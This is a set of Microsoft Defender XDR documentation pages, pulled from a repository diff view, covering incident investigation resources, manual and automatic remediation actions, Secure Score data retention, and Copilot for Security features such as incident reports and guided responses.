-The following sections contain tutorials and videos of Microsoft Defender XDR features that aid incident response teams in investigating various complex attacks.
-
-### Ransomware investigations
-
-Ransomware continues to be a significant threat to organizations. Microsoft has the following resources to help you investigate and respond to ransomware attacks:
--- **Guides**: [From detection to protection: Microsoft's guide to combating ransomware attacks](/security/ransomware/)-- **Tutorial**: [Ransomware investigation playbook](/security/operations/incident-response-playbook-dart-ransomware-approach)-- **Video**: [Investigating ransomware attacks in Microsoft Defender XDR (part 1)](https://youtu.be/eLCrGe4-Zzc)-- **Video**: [Investigating ransomware attacks in Microsoft Defender XDR (part 2)](https://youtu.be/q1s7lm3O9Sc)-
-### Email-based attacks analysis
-
-Identifying and tracking modified, created, or stolen identities are essential to investigating phishing and BEC attacks. Use the following resources when investigating these attacks:
--- **Tutorial**: [Investigate malicious email](/microsoft-365/security/office-365-security/threat-explorer-investigate-delivered-malicious-email)-- **Tutorial**: [Investigate users](investigate-users.md)-- **Tutorial**: [Investigate a user account](/microsoft-365/security/defender-endpoint/investigate-user)-- **Blog**: [Total Identity Compromise: Microsoft Incident Response lessons on securing Active Directory
-Identity compromise can also be investigated using Defender for Identity signals.](https://techcommunity.microsoft.com/t5/microsoft-security-experts-blog/total-identity-compromise-microsoft-incident-response-lessons-on/ba-p/3753391)
-- **Tutorial**: [Example of a phishing email attack](first-incident-path-phishing.md)-- **Tutorial**: [Example of an identity-based attack](first-incident-path-identity.md)-
-The following videos discuss how to investigate phishing and BEC attacks in Microsoft Defender XDR:
--- **Video**: [Investigating BEC and AiTM phishing in Microsoft Defender XDR](https://youtu.be/h9YEr9XwALU)-- **Video**: Defending against spearphishing and phishing using Defender for Office 365-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE5bzVE]
-
-Investigate an identity compromise and know what you can do to contain an attack through this video:
--- [Investigating identity threats using Defender for Identity](https://youtu.be/RSVmgcQLv38?t=533)-
-### Malware analysis
-
-A malicious file's information and capabilities are key to investigating malware. Microsoft Defender XDR, in most cases, can detonate the file to show critical data including hash, metadata, prevalence within the organization, and file capabilities based on MITRE ATT&CK® techniques. This removes the need to do black box testing or static analysis of files. You can view file information from the incident graph, or by viewing an alert process tree, an artifact timeline, or a device timeline.
-
-The following resources provide details on how to use the portal's capabilities in investigating files:
--- **Tutorial**: [Investigate files](/microsoft-365/security/defender-endpoint/investigate-files)-- **Video**: [Investigating malware in Microsoft Defender XDR](https://youtu.be/TTqFlnlwch0)-
-### Risky apps analysis and cloud-based threats prevention
-
-Malicious actors can exploit cloud-based apps. Apps can inadvertently leak sensitive information through abuse or misuse. Incident responders investigating and protecting apps in cloud environments can use the following resources where Defender for Cloud Apps is deployed in their organizations:
--- **Tutorial**: [Investigate malicious and compromised apps](/security/operations/incident-response-playbook-compromised-malicious-app)-- **Tutorial**: [Investigate risky OAuth apps](/defender-cloud-apps/investigate-risky-oauth)-- **Tutorial**: [Protect cloud apps](/defender-cloud-apps/tutorial-ueba#phase-1-connect-to-the-apps-you-want-to-protect)-- **Tutorial**: Protect apps in real time-
-Discover how you can protect your cloud apps in real time with this video of the Defender for Cloud Apps workload:
--- **Video**: Protecting cloud apps and related files through Defender for Cloud Apps-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE5d0tz]
-
-### Breach analysis
-
-Nation-state attacks, attacks against critical infrastructure, and organizational breaches often require an attacker to establish communication points once they are in a network. Incident responders look for clues by identifying suspicious traffic or exchanges between a source and a destination. Microsoft has the following tutorials for investigating communication components:
--- [Investigate domains and URLs](/microsoft-365/security/defender-endpoint/investigate-domain)-- [Investigate an IP address](/microsoft-365/security/defender-endpoint/investigate-ip)-- [Investigate connection events that occur behind forward proxies](/microsoft-365/security/defender-endpoint/investigate-behind-proxy)-- [Investigate suspicious user and device activities through Defender for Identity](/defender-for-identity/investigate-assets)-- [Identify and investigate lateral movement paths in Defender for Identity](/defender-for-identity/understand-lateral-movement-paths)-- [Investigate devices in the Defender for Endpoint devices list](/microsoft-365/security/defender-endpoint/investigate-machines)-
-Attackers often use vulnerabilities to gain access to an organization. Some ransomware attacks initially take advantage of unpatched vulnerabilities like the [Log4Shell vulnerability](/microsoft-365/security/defender-vulnerability-management/tvm-manage-log4shell-guidance). The following resources help incident responders identify vulnerabilities and vulnerable devices in their organization through the Defender for Vulnerability Management service:
--- **Tutorial**: [Identify vulnerabilities in your organization](/microsoft-365/security/defender-vulnerability-management/tvm-weaknesses)-- **Tutorial**: [Hunt for exposed devices](/microsoft-365/security/defender-vulnerability-management/tvm-hunt-exposed-devices)-- **Tutorial**: [Assess your organization's risk through the Exposure score](/microsoft-365/security/defender-vulnerability-management/tvm-exposure-score)-- **Video**: Threat and vulnerability management via Defender Vulnerability Management-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4XTiJ]
-
-Breaches also happen through various devices like phones and tablets that connect to your organization's network. Incident responders can further investigate these devices within the portal. The following video talks about the top threats from mobile devices and how you can investigate these:
--- Mobile threat defense in Microsoft Defender XDR-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RW10icV]
-
-## Resources for threat intelligence and hunting
-
-Microsoft Defender XDR's built-in threat intelligence capabilities and hunting aid incident response teams in performing proactive protection against emerging threats and attacks. You have direct access to the latest information on emerging threats and attacks through the portal's [Threat analytics](threat-analytics.md).
--
-Use the intelligence in Threat analytics to deep dive into new threats with the following video:
-
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RWwJfU]
-
-Proactively hunt for threats within the organization using the portal's built-in [advanced hunting](advanced-hunting-overview.md) capability.
--
-The following resources provide more information on how to use advanced hunting:
--- [Learn the Kusto query language](advanced-hunting-query-language.md)-- [Build hunting queries using the guided mode](advanced-hunting-query-builder.md)-- [Hunt for threats across entities](advanced-hunting-query-emails-devices.md)-
-Extend your threat intelligence with the latest security research and changes from Microsoft security research teams:
--- [Microsoft Security blog](https://www.microsoft.com/security/blog/topic/threat-intelligence/?sort-by=newest-oldest&date=any)-- [Microsoft threat actor information](/microsoft-365/security/intelligence/microsoft-threat-actor-naming)-
-Collaborate with Microsoft's experts for incident response and threat hunting to enhance your security operations teams' capabilities. Know more about our experts and how to engage them in the following resources:
--- [Defender Experts for XDR](dex-xdr-overview.md)-- [Threat hunting with Defender Experts for Hunting](defender-experts-for-hunting.md)-
-## Next step
--- [Remediate your first incident](respond-first-incident-remediate.md)-- Explore the portal's features through video demos in the [Microsoft Defender XDR Virtual Ninja Training](https://adoption.microsoft.com/en-us/ninja-show/)-
-## See also
--- [Understand incidents](respond-first-incident-365-defender.md)-- [Investigate incidents](investigate-incidents.md)-- [Investigate alerts](investigate-alerts.md)-- Learn the portal's features and functions through the [Microsoft Defender XDR Ninja training](https://techcommunity.microsoft.com/t5/microsoft-365-defender/become-a-microsoft-365-defender-ninja/ba-p/1789376)-
security Respond First Incident Remediate https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/respond-first-incident-remediate.md
- Title: Remediate your first incident in Microsoft Defender XDR
-description: How to get started in remediating your first incident in Microsoft Defender XDR.
-keywords: incidents, alerts, attack story, investigate, correlation, attack, machines, devices, users, identities, identity, mailbox, email, 365, microsoft, m365, incident response, cyber-attack, incident response, remediation, remediate attack, remediate incident
-search.product: eADQiWindows 10XVcnh
-
-ms.sitesec: library
-ms.pagetype: security
- - NOCSH
----
- - m365-security
- - m365solution-firstincident
- - highpri
- - tier1
-
- - MOE150
- - MET150
Previously updated : 08/21/2023--
-# Remediate your first incident in Microsoft Defender XDR
--
-**Applies to:**
--- Microsoft Defender XDR-
-Microsoft Defender XDR provides detection and analysis capabilities to ensure containment and eradication of threats. Containment includes steps to reduce the impact of the attack while eradication ensures all traces of attacker activity are removed from the network.
-
-Remediation in Microsoft Defender XDR can be automated or through manual actions taken by incident responders. Remediation actions can be taken on devices, files, and identities.
-
-## Automatic remediation
-
-Microsoft Defender XDR leverages its threat intelligence and the signals within your network to combat the most disruptive attacks. Ransomware, business email compromise (BEC), and adversary-in-the-middle (AiTM) phishing are some of the most complex attacks that can be contained immediately through [automatic attack disruption](automatic-attack-disruption.md) capability. Once an attack has been disrupted, incident responders can take over and fully investigate an attack and apply the required remediation.
-
-Learn how automatic attack disruption helps in incident response:
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RW10OoF]
-
-Meanwhile, Microsoft Defender XDR's [automated investigation and response](m365d-autoir.md) capabilities can automatically investigate and apply remediation actions to malicious and suspicious items. These capabilities scale investigation and resolution to threats, freeing incident responders to focus their efforts on high-impact attacks.
-
-You can [configure](m365d-configure-auto-investigation-response.md) and [manage](m365d-autoir-actions.md) automated investigation and response capabilities. You can also view all past and pending actions through the [Action center](m365d-action-center.md).
-
-> [!NOTE]
-> You can undo automatic actions after review.
-
-To speed up some of your investigation tasks, you can [triage alerts with Power Automate](investigate-alerts.md#use-power-automate-to-triage-alerts). In addition, automated remediation can be created using automation and playbooks. Microsoft has [playbook templates on GitHub](https://github.com/microsoft/Microsoft-Cloud-App-Security/tree/master/Playbooks) for the following scenarios:
--- Remove sensitive file sharing after requesting user validation-- Auto-triage infrequent country alerts-- Request for manager action before disabling an account-- Disable malicious inbox rules-
-Playbooks use Power Automate to create custom robotic process automation flows to automate certain activities once specific criteria have been triggered. Organizations can create playbooks either from existing templates or from scratch. Playbooks can also be created during post-incident review to create remediation actions from resolved incidents.
-
-Learn how Power Automate can help you automate your incident response through this video:
-
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RWFIRn]
-
-## Manual remediation
-
-While responding to an attack, security teams can leverage the portal's manual remediation actions to stop attacks from further incurring damage. Some actions can immediately stop a threat, while others assist in further forensic analysis. You can apply these actions to any entity depending on the Defender workloads deployed within your organization.
-
-### Actions on devices
--- [**Isolate the device**](/microsoft-365/security/defender-endpoint/respond-machine-alerts#isolate-devices-from-the-network) - isolates an affected device by disconnecting the device from the network. The device remains connected to the Defender for Endpoint service for continued monitoring. -- [**Restrict app execution**](/microsoft-365/security/defender-endpoint/respond-machine-alerts#restrict-app-execution) - restricts an application by applying a code integrity policy that only allows files to run if they're signed by a Microsoft-issued certificate.-- [**Run Antivirus scan**](/microsoft-365/security/defender-endpoint/respond-machine-alerts#run-microsoft-defender-antivirus-scan-on-devices) - initiates a Defender Antivirus scan remotely for a device. The scan can run alongside other antivirus solutions, whether Defender Antivirus is the active antivirus solution or not.-- [**Collect investigation package**](/microsoft-365/security/defender-endpoint/respond-machine-alerts#collect-investigation-package-from-devices) - you can collect an investigation package from a device as part of the investigation or response process. By collecting the investigation package, you can identify the current state of the device and further understand the tools and techniques used by the attacker.-- [**Initiate automated investigation**](/microsoft-365/security/defender-endpoint/respond-machine-alerts#initiate-automated-investigation) - starts a new general purpose automated investigation on the device. While an investigation is running, any other alert generated from the device will be added to an ongoing automated investigation until that investigation is completed. In addition, if the same threat is seen on other devices, those devices are added to the investigation.-- [**Initiate live response**](/microsoft-365/security/defender-endpoint/respond-machine-alerts#initiate-live-response-session) - gives you instantaneous access to a device by using a remote shell connection so you can do in-depth investigative work and take immediate response actions to promptly contain identified threats in real time. Live response is designed to enhance investigations by enabling you to collect forensic data, run scripts, send suspicious entities for analysis, remediate threats, and proactively hunt for emerging threats.
-
-- [**Ask Defender Experts**](/microsoft-365/security/defender-endpoint/respond-machine-alerts#consult-a-threat-expert) - you can consult a Microsoft Defender expert for more insights regarding potentially compromised or already compromised devices. Microsoft Defender experts can be engaged directly from within the portal for a timely and accurate response. This action is available for both devices and files.-
-Other actions on devices are available through the following tutorial:
--- [Response actions on a device enabled through Defender for Endpoint](/microsoft-365/security/defender-endpoint/respond-machine-alerts)-
-> [!NOTE]
-> You can take actions on devices straight from the graph within the attack story.
-
-### Actions on files
--- [**Stop and quarantine file**](/microsoft-365/security/defender-endpoint/respond-file-alerts#stop-and-quarantine-files-in-your-network) - includes stopping running processes, quarantining files, and deleting persistent data like registry keys.-- [**Add indicators to block or allow file**](/microsoft-365/security/defender-endpoint/respond-file-alerts#add-indicator-to-block-or-allow-a-file) - prevents an attack from spreading further by banning potentially malicious files or suspected malware. This operation prevents the file from being read, written, or executed on devices in your organization.-- [**Download or collect file**](/microsoft-365/security/defender-endpoint/respond-file-alerts#download-or-collect-file) ΓÇô allows analysts to download a file in a password protected .zip archive file for further analysis by the organization.-- [**Deep analysis**](/microsoft-365/security/defender-endpoint/respond-file-alerts#deep-analysis) ΓÇô executes a file in a secure, fully instrumented cloud environment. Deep analysis results show the file's activities, observed behaviors, and associated artifacts, such as dropped files, registry modifications, and communication with IP addresses.-
-## Remediating other attacks
-
-> [!NOTE]
-> These tutorials apply when other Defender workloads are enabled in your environment.
-
-The following tutorials enumerate steps and actions that you can apply when investigating entities or responding to specific threats:
--- [Responding to a compromised email account via Defender for Office 365](/microsoft-365/security/office-365-security/responding-to-a-compromised-email-account)-- [Remediating vulnerabilities with Defender for Vulnerability Management](/microsoft-365/security/defender-vulnerability-management/tvm-remediation)-- [Remediation actions for user accounts via Defender for Identity](/defender-for-identity/remediation-actions)-- [Applying policies to control apps with Defender for Cloud Apps](/defender-cloud-apps/control-cloud-apps-with-policies)-
-## Next steps
--- [Simulate attacks through the attack simulation training](eval-defender-investigate-respond-simulate-attack.md)-- Explore Microsoft Defender XDR through the [Virtual Ninja training](https://adoption.microsoft.com/ninja-show/)-
-## See also
--- [Investigate incidents](investigate-incidents.md)-- Learn the portal's features and functions through the [Microsoft Defender XDR Ninja training](https://techcommunity.microsoft.com/t5/microsoft-365-defender/become-a-microsoft-365-defender-ninja/ba-p/1789376)-
security Secure Score Data Storage Privacy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/secure-score-data-storage-privacy.md
- Title: Microsoft Secure score data storage and privacy
-description: Learn about how Microsoft Secure score handles privacy and data that it collects.
-keywords: microsoft secure score, secure score, Microsoft Defender portal, Secure score, data storage and privacy, storage, privacy, licensing, geolocation, data retention, data
-
-ms.sitesec: library
-ms.pagetype: security
------ m365-security-- tier2- Previously updated : 11/17/2022--
-# Microsoft Secure Score data storage and privacy
--
-This section covers frequently asked questions regarding privacy and data handling for Secure Score.
-
-## Data storage location
-
-Secure score operates in the Microsoft Azure datacenters in the European Union, the United Kingdom, or in the United States. Customer data collected by the service may be stored in: (a) the geo-location of the tenant as identified during provisioning or, (b) if Secure Score uses another Microsoft online service to process such data, the geolocation as defined by the data storage rules of that other online service.
-
-Customer data in pseudonymized form may also be stored in the central storage and processing systems in the United States.
-
-Once configured, you can't change the location where your data is stored. This provides a convenient way to minimize compliance risk by actively selecting the geographic locations where your data will reside.
-
-## How long will Microsoft store my data? What is Microsoft's data retention policy?
-
-### At service onboarding
-
-By default, data is retained for 90 days based on your active licenses.
-
-### At contract termination or expiration
-
-Your data is kept and is available to you while the license is under grace period or suspended mode. At the end of this period, data that is associated to expired or terminated license is erased from Microsoft's systems to make it unrecoverable, no later than 90 days from the associated contract termination or expiration.
security Security Copilot In Microsoft 365 Defender https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/security-copilot-in-microsoft-365-defender.md
- Title: Microsoft Copilot in Microsoft Defender
-description: Learn about Microsoft Copilot for Security capabilities embedded in Microsoft Defender.
-keywords: security copilot, Microsoft Defender XDR, embedded experience, incident summary, script analyzer, script analysis, query assistant, m365, incident report, guided response, incident response automated, automatic incident response, summarize incidents, summarize incident report, plugins, Microsoft plugins, preinstalled plugins, Microsoft Copilot for Security, Copilot for Security, file analysis, file analyzer, summarize device, device summary, summarize device information, device report, file information report, Microsoft Defender, Copilot in Defender
-
-ms.sitesec: library
-ms.pagetype: security
- - NOCSH
----
- - m365-security
- - tier1
- - security-copilot
-
- - MOE150
- - MET150
Previously updated : 04/01/2024--
-# Microsoft Copilot in Microsoft Defender
--
-**Applies to:**
--- Microsoft Defender XDR-- Microsoft Defender unified security operations center (SOC) platform-
-[Microsoft Copilot for Security](/security-copilot/microsoft-security-copilot) brings together the power of AI and human expertise to help security teams respond to attacks faster and more effectively. Copilot for Security is embedded in the Microsoft Defender portal to enable security teams to efficiently summarize incidents, analyze scripts and codes, analyze files, summarize device information, use guided responses to resolve incidents, generate KQL queries, create incident reports.
-
-This article provides an overview for users of the Copilot in Defender, including steps to access, key capabilities, and links to the details of these capabilities.
-
-<a name='access-security-copilot-in-microsoft-365-defender'></a>
-
-## Access Copilot in Defender
-
-To ensure that you have access to Copilot in Defender, see the [Copilot for Security purchase and licensing information](/security-copilot/faq-security-copilot). Once you have access to Copilot for Security, the key capabilities discussed below become accessible in the Microsoft Defender portal.
-
-## Investigate and respond to incidents like an expert
-
-Enable security teams to tackle attack investigations in a timely manner with ease and precision. Copilot helps teams to understand attacks immediately, quickly analyze suspicious files and scripts, and promptly assess and apply appropriate mitigation to stop and contain attacks.
-
-### Summarize incidents quickly
-
-Investigating incidents with multiple alerts can be a daunting task. To immediately understand an incident, you can tap Copilot to [summarize an incident](security-copilot-m365d-incident-summary.md) for you. Copilot creates an overview of the attack containing essential information for you to understand what transpired in the attack, what assets are involved, and the timeline of the attack. Copilot automatically creates a summary when you navigate to an incident's page.
--
-### Take action on incidents through guided responses
-
-Resolving incidents require analysts to have an understanding of an attack to know what solutions are appropriate. Copilot recommends solutions through [guided responses](security-copilot-m365d-guided-response.md) that are specific to each incident.
--
-### Run script analysis with ease
-
-Most attackers rely on sophisticated malware when launching attacks to avoid detection and analysis. These malware are usually obfuscated, and might be in the form of scripts or command lines in PowerShell. Copilot can quickly [analyze scripts](security-copilot-m365d-script-analysis.md), reducing the time for investigation.
--
-### Generate device summaries
-
-Investigating devices involved in incidents can be a tasking job. To quickly assess a device, Copilot can [summarize a device's information](copilot-in-defender-device-summary.md), including the device's security posture, any unusual behaviors, a list of vulnerable software, and relevant Microsoft Intune information.
--
-### Analyze files promptly
-
-Copilot helps security teams quickly assess and understand suspicious files with [file analysis](copilot-in-defender-file-analysis.md). Copilot provides a file's summary, including detection information, related file certificates, a list of API calls, and strings found in the file.
--
-### Write incident reports efficiently
-
-Security operations teams usually write reports to record important information, including what response actions were taken and the corresponding results, the team members involved, and other information to aid future security decisions and learning. Oftentimes, documenting incidents can be time-consuming. For incident reports to be effective, it must contain an incident's summary along with the actions taken, including what actions were taken by whom and when. Copilot [generates an incident report](security-copilot-m365d-create-incident-report.md) by quickly consolidating these pieces of information.
--
-## Hunt like a pro
-
-Copilot in Defender helps security teams proactively hunt for threats in their network by quickly building appropriate KQL queries.
-
-### Generate KQL queries from natural-language input
-
-Security teams who use advanced hunting to proactively hunt for threats in their network can now use a query assistant that converts any natural-language question in the context of threat hunting, into a ready-to-run KQL query. The query assistant saves security teams time by generating a KQL query that can then be automatically run or further tweaked according to the analyst needs. Read more about the query assistant in [Copilot for Security in advanced hunting](advanced-hunting-security-copilot.md).
--
-## Protect your organization with relevant threat intelligence
-
-Empower your security organization to make informed decisions with the latest threat intelligence. Copilot consolidates and summarizes threat intelligence to help security teams prioritize and respond to threats effectively.
-
-### Monitor threat intelligence
-
-Ask Copilot to summarize the relevant threats impacting your environment, to prioritize resolving threats based on your exposure levels, or to find threat actors that might be targeting your industry. Read more about [Copilot for Security in threat intelligence](/defender/threat-intelligence/using-copilot-threat-intelligence-defender-xdr).
--
-## Data security and feedback in Copilot
-
-Copilot continuously evolves using [data](/security-copilot/privacy-data-security#customer-data-and-system-generated-logs) that is [stored](/security-copilot/privacy-data-security#customer-data-storage-location), [processed](/security-copilot/privacy-data-security#location-for-prompt-evaluation), and [shared](/security-copilot/privacy-data-security#customer-data-sharing-preferences) depending on the settings defined by your administrator. Microsoft ensures that your data is always protected and secure when using Copilot. To learn more about data security and privacy in Copilot, see [Privacy and data security in Copilot](/security-copilot/privacy-data-security).
-
-Because of its continuing evolution, Copilot might miss some things. Reviewing and [providing feedback](/security-copilot/rai-faqs-security-copilot#what-are-the-limitations-of-security-copilot-how-can-users-minimize-the-impact-of-security-copilots-limitations-when-using-the-system) about the results helps improve Copilot's future responses.
-
-All Copilot in Defender capabilities have an option for providing feedback. To provide feedback, perform the following steps:
-
-1. Select the feedback icon ![Screenshot of the feedback icon for Copilot in Defender cards](../../media/copilot-in-defender/copilot-defender-feedback.png) located at the bottom of any results card in the Copilot side panel.
-2. Select **Confirmed, it looks great** if the results are accurate based on your assessment. You can provide more information in the next dialog box.
-3. Select **Off-target, inaccurate** if any detail is incorrect or incomplete based on your assessment. You can provide more information about your assessment in the next dialog box and submit this assessment to Microsoft.
-4. You can also report the results if it contains questionable or ambiguous information by selecting **Potentially harmful, inappropriate**. Provide more information about the results in the next dialog box and select Submit.
-
-<a name='microsoft-365-defender-plugin-in-security-copilot'></a>
-
-## Plugins in Copilot for Security
-
-Copilot uses [preinstalled Microsoft plugins](/security-copilot/manage-plugins#preinstalled-plugins) like Microsoft Defender XDR, Defender Threat Intelligence, and Natural Language to KQL for Microsoft Sentinel and Defender XDR plugins to generate relevant information, provide more context to incidents, and generate more accurate results. Ensure that [plugins are turned on in Copilot](/security-copilot/manage-plugins#managing-preinstalled-plugins) to allow access to relevant data and to generate requested content from other Microsoft services in your organization.
-
-## Next steps
--- [Learn how to summarize incidents](security-copilot-m365d-incident-summary.md)-- [Use guided responses when responding to incidents](security-copilot-m365d-guided-response.md)-- [Run script analysis](security-copilot-m365d-script-analysis.md)-- [Analyze files](copilot-in-defender-file-analysis.md)-- [Generate device summary](copilot-in-defender-device-summary.md)-- [Generate KQL queries](advanced-hunting-security-copilot.md)-- [Create incident reports](security-copilot-m365d-create-incident-report.md)-- [Use threat intelligence](/defender/threat-intelligence/security-copilot-and-defender-threat-intelligence)-
-## See also
--- [Get started with Copilot for Security](/security-copilot/get-started-security-copilot)-- [Privacy and data security in Copilot](/security-copilot/privacy-data-security)-- [Responsible AI FAQs](/security-copilot/responsible-ai-overview-security-copilot)-- Other [Copilot for Security embedded experiences](/security-copilot/experiences-security-copilot)-
security Security Copilot M365d Create Incident Report https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/security-copilot-m365d-create-incident-report.md
- Title: Create incident reports with Microsoft Copilot in Microsoft Defender
-description: Write incident reports with Microsoft Copilot in Microsoft Defender.
-keywords: security copilot, Microsoft Defender XDR, embedded experience, incident report, script analyzer, script analysis, query assistant, m365, incident report, guided response, incident response playbooks, incident response, incident report creation, create report, create incident report, write incident report, write report, Microsoft Copilot for Security, Microsoft Defender, Copilot in Defender
-
-ms.sitesec: library
-ms.pagetype: security
- - NOCSH
----
- - m365-security
- - tier1
- - security-copilot
-
- - MOE150
- - MET150
Previously updated : 04/01/2024--
-# Create an incident report with Microsoft Copilot in Microsoft Defender
--
-**Applies to:**
--- Microsoft Defender XDR-- Microsoft Defender unified security operations center (SOC) platform-
-[Microsoft Copilot for Security](/security-copilot/microsoft-security-copilot) in the Microsoft Defender portal assists security operations teams with writing incident reports efficiently. Utilizing Copilot for Security's AI-powered data processing, security teams can immediately create incident reports with a click of a button in the Microsoft Defender portal.
-
-A comprehensive and clear incident report is an essential reference for security teams and security operations management. However, writing a comprehensive report with the important details present can be a time-consuming task for security operations teams. Collecting, organizing, and summarizing incident information from multiple sources requires focus and detailed analysis to create an information-rich report. With Copilot in Defender, security teams can now instantly create an extensive incident report within the portal.
-
-While an [incident summary](security-copilot-m365d-incident-summary.md) provides an overview of an incident and how it happened, an incident report consolidates incident information from various data sources available in Microsoft Sentinel and Defender XDR. The Copilot-generated incident report also includes all analyst-driven steps and automated actions, the analysts involved in incident response, and the comments from the analysts. Whether security teams are using Microsoft Sentinel, Defender XDR, or both, all relevant incident data are added into the generated incident report.
-
-Copilot generates the incident report based on the automatic and manual actions implemented, and the analysts' comments and notes posted in the incident. You can review and follow [recommendations](security-copilot-m365d-create-incident-report.md#recommendations-for-incident-report-creation) to ensure that Copilot creates a comprehensive incident report.
-
-The incident report generation capability in Microsoft Defender is available through the [Copilot for Security license](/security-copilot/faq-security-copilot). This capability is also available in the Copilot for Security standalone portal through the Microsoft Defender XDR plugin.
-
-This guide lists the data in incident reports and contains steps on how to access the incident report creation capability within the Microsoft Defender portal. It also includes information on how to provide feedback about the generated report.
-
-## Incident report content
-
-Copilot in Defender creates an incident report containing the following information:
--- The main incident management actions' timestamps, including:
- - Incident creation and closure
- - First and last logs, whether the log was analyst-driven or automated, captured in the incident
-- The analysts involved in incident response-- [Incident classification](manage-incidents.md#specify-the-classification), including the analyst's reason for classification that Copilot summarizes-- Investigation and remediation actions-- Follow up actions like recommendations, open issues, or next steps noted by the analysts in the incident logs-
-Actions like device isolation, disabling a user, and soft delete of emails are included in the incident report. For a full list of actions included in the incident report, see the [Action center](m365d-action-center.md). The incident report also includes [Microsoft Sentinel playbooks ran](/azure/sentinel/automate-responses-with-playbooks). [Live response commands](/microsoft-365/security/defender-endpoint/live-response) and response actions coming from public API sources or from custom detections are not yet supported.
-
-We recommend resolving the incident to view all actions that have been taken. Incidents that are not resolved will partially reflect the actions in the incident report.
-
-## Create an incident report
-
-To create an incident report with Copilot in Defender, perform the following steps:
-
-1. Open an incident page. In the incident page, navigate to the **More actions** ellipsis (...) and then select **Generate incident report**. Alternately, you can select the report icon found in the Copilot side panel.
-
- :::image type="content" source="../../media/copilot-in-defender/create-report/incident-report-create-small.png" alt-text="Screenshot highlighting the generated incident report and report icon buttons in the incident page." lightbox="../../media/copilot-in-defender/create-report/incident-report-create.png":::
-
-2. Copilot creates the incident report. You can stop the report creation by selecting **Cancel** and restart report creation by selecting **Regenerate**. Additionally, you can restart report creation if you encounter an error.
-
-3. The incident report card appears on the Copilot pane. The generated report depends on the incident information available from Microsoft Defender XDR and Microsoft Sentinel. Refer to the [recommendations](security-copilot-m365d-create-incident-report.md#recommendations-for-incident-report-creation) to ensure a comprehensive incident report.
-
- :::image type="content" source="../../media/copilot-in-defender/create-report/incident-report-main1-small.png" alt-text="Screenshot of the incident report card in the incident page showing the top half of the card." lightbox="../../media/copilot-in-defender/create-report/incident-report-main1.png":::
-
- :::image type="content" source="../../media/copilot-in-defender/create-report/incident-report-main2-small.png" alt-text="Screenshot of the incident report card in the incident page showing the lower bottom of the card." lightbox="../../media/copilot-in-defender/create-report/incident-report-main2.png":::
-
-4. Select the More actions ellipsis (...) located on the upper right of the incident report card. To copy the report, select **Copy to clipboard** and paste the report to your preferred system, **Post to activity log** to add the report to the activity log in the Microsoft Defender portal, or **Export incident as PDF** to [export the incident data to PDF](manage-incidents.md#export-incident-data-to-pdf). Select **Regenerate** to restart report creation. You can also **Open in Copilot for Security** to view the results and continue accessing other plugins available in the Copilot for Security standalone portal.
-
- ![Screenshot of additional actions in the incident report results card.](../../media/copilot-in-defender/create-report/incident-report-more-actions1.png)
-
-5. Review the generated incident report. You can provide feedback on the report by selecting the feedback icon found on the bottom of the results ![Screenshot of the feedback icon for Copilot in Defender cards](../../media/copilot-in-defender/create-report/copilot-defender-feedback.png).
-
-## Export incident to PDF
-
-You can export the incident data to PDF to create a report that you can easily share with stakeholders. The exported incident data contains relevant information like the attack story, impacted assets, relevant alerts, and AI-generated content from Copilot, like the incident summary and incident report. With this capability, security teams can quickly export more incident information for post-incident discussions within team members or with other stakeholders.
-
-You can follow the steps in [export incident data to PDF](manage-incidents.md#export-incident-data-to-pdf) to generate the PDF.
-
-## Recommendations for incident report creation
-
-Here are some recommendations to consider to ensure that Copilot generates a comprehensive and complete incident report:
--- Classify and resolve the incident before generating the incident report.-- Ensure that you write and save comments in the Microsoft Sentinel activity log or in the [Microsoft Defender XDR incident activity log](manage-incidents.md#activity-log) to include the comments in the incident report.-- Write comments using comprehensive and clear language. In-depth and clear comments provide better context about the response actions. See the following steps to know how to access the comments field:
- - [Add comments to incidents in the Microsoft Defender portal](manage-incidents.md#add-comments)
- - Add comments to incidents in Microsoft Sentinel
-- For ServiceNow users, [enable the Microsoft Sentinel and ServiceNow bi-directional sync](https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/what-s-new-introducing-microsoft-sentinel-solution-for/ba-p/3692840) to get more robust incident data.-- Copy the generated incident report and post it to the activity log in the Microsoft Defender portal to ensure that the incident report is saved in the incident page.-
-## See also
--- [Get started with Microsoft Copilot for Security](/security-copilot/get-started-security-copilot)-- [Learn about other Copilot for Security embedded experiences](/security-copilot/experiences-security-copilot)-- Know more about [preinstalled plugins in Copilot for Security](/security-copilot/manage-plugins#preinstalled-plugins)-
security Security Copilot M365d Guided Response https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/security-copilot-m365d-guided-response.md
- Title: Triage and investigate incidents with guided responses with Microsoft Copilot in Microsoft Defender
-description: Resolve incidents using guided responses delivered by Microsoft Copilot in Microsoft Defender.
-keywords: security copilot, Microsoft Defender XDR, embedded experience, incident summary, script analyzer, script analysis, query assistant, m365, incident report, guided response, incident response playbooks, incident response, incident response playbooks, remediate incident, remediation actions, incident solution, resolve incidents, guided responses, security copilot guided response, copilot in security guided response, security copilot guided response in Microsoft Defender XDR, Microsoft Copilot for Security, Microsoft Defender, Copilot in Defender
-
-ms.sitesec: library
-ms.pagetype: security
- - NOCSH
----
- - m365-security
- - tier1
- - security-copilot
-
- - MOE150
- - MET150
Previously updated : 04/01/2024--
-# Triage and investigate incidents with guided responses from Microsoft Copilot in Microsoft Defender
--
-**Applies to:**
--- Microsoft Defender XDR-- Microsoft Defender unified security operations center (SOC) platform-
-[Microsoft Copilot for Security](/security-copilot/microsoft-security-copilot) in the Microsoft Defender portal supports incident response teams in immediately resolving incidents with guided responses. Copilot in Defender uses AI and machine learning capabilities to contextualize an incident and learn from previous investigations to generate appropriate response actions.
-
